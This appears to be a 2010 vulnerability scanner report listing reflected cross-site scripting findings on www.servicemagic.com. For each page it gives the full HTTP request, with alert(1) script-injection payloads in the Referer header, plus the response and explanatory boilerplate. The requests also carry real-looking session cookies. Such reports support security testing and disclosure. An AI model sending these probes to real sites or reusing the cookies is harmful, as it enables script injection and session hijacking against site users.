GET /c.New_York.NY.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=48428"><script>alert(1)</script>b7c6712ac0f
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:05 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76deb"><script>alert(1)</script>ab74448bd9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Pittsburgh.PA.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=76deb"><script>alert(1)</script>ab74448bd9b
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:03 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d831f"><script>alert(1)</script>97ea906f3f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Raleigh.NC.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=d831f"><script>alert(1)</script>97ea906f3f5
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:04 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a096"><script>alert(1)</script>1f1454eda87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.San_Francisco.CA.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=6a096"><script>alert(1)</script>1f1454eda87
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:02 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: ca
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19470"><script>alert(1)</script>24ac96593ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Washington.DC.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=19470"><script>alert(1)</script>24ac96593ca
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:07 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f577c"><script>alert(1)</script>e4fea1fb02e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=f577c"><script>alert(1)</script>e4fea1fb02e
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:16:30 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- /rfs/servicerequest/exactmatch/SMDirHome.jsp -->
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cfc"><script>alert(1)</script>bea7feb4501 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /clp/ HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=53cfc"><script>alert(1)</script>bea7feb4501
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:04 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd579"><script>alert(1)</script>0a7465b1491 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /commercial HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=dd579"><script>alert(1)</script>0a7465b1491
Response (redirected)
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:00 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f17f"><script>alert(1)</script>ba8ba145129 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /electricians/ HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=6f17f"><script>alert(1)</script>ba8ba145129
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:25 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- /electricians/index.jsp --> <html xmlns="http://www.w3.org/1999/xhtml" xm ...[SNIP]... <input type="hidden" name="referringUrl" value="http://www.google.com/search?hl=en&q=6f17f"><script>alert(1)</script>ba8ba145129"/> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea62"><script>alert(1)</script>8041b654483 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ext/400678 HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=aea62"><script>alert(1)</script>8041b654483
Response (redirected)
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:08 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c65"><script>alert(1)</script>fa21734f17d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home-improvement-projects/ HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=84c65"><script>alert(1)</script>fa21734f17d
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:40 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5079c"><script>alert(1)</script>638edebde70 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hs-sitemap/sitemap.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=5079c"><script>alert(1)</script>638edebde70
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:48 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- /home-improvement-site-map/hsSiteMap.jsp -->
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d743"><script>alert(1)</script>11ee823d331 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /kitchen-remodeling/ HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=7d743"><script>alert(1)</script>11ee823d331
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:28 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- /kitchen-remodeling/index.jsp -->
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd89'-alert(1)-'975465dc26c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs/cxp/ HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=9cd89'-alert(1)-'975465dc26c
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:15:51 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 315b6"><script>alert(1)</script>5391b11f7d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /plumbers/ HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=315b6"><script>alert(1)</script>5391b11f7d6
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:20 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- /plumbers/index.jsp -->
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd0d"><script>alert(1)</script>b48dfabe5c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.Senior-Care.94.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=8bd0d"><script>alert(1)</script>b48dfabe5c3
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:17:57 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39955"><script>alert(1)</script>20654db5c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
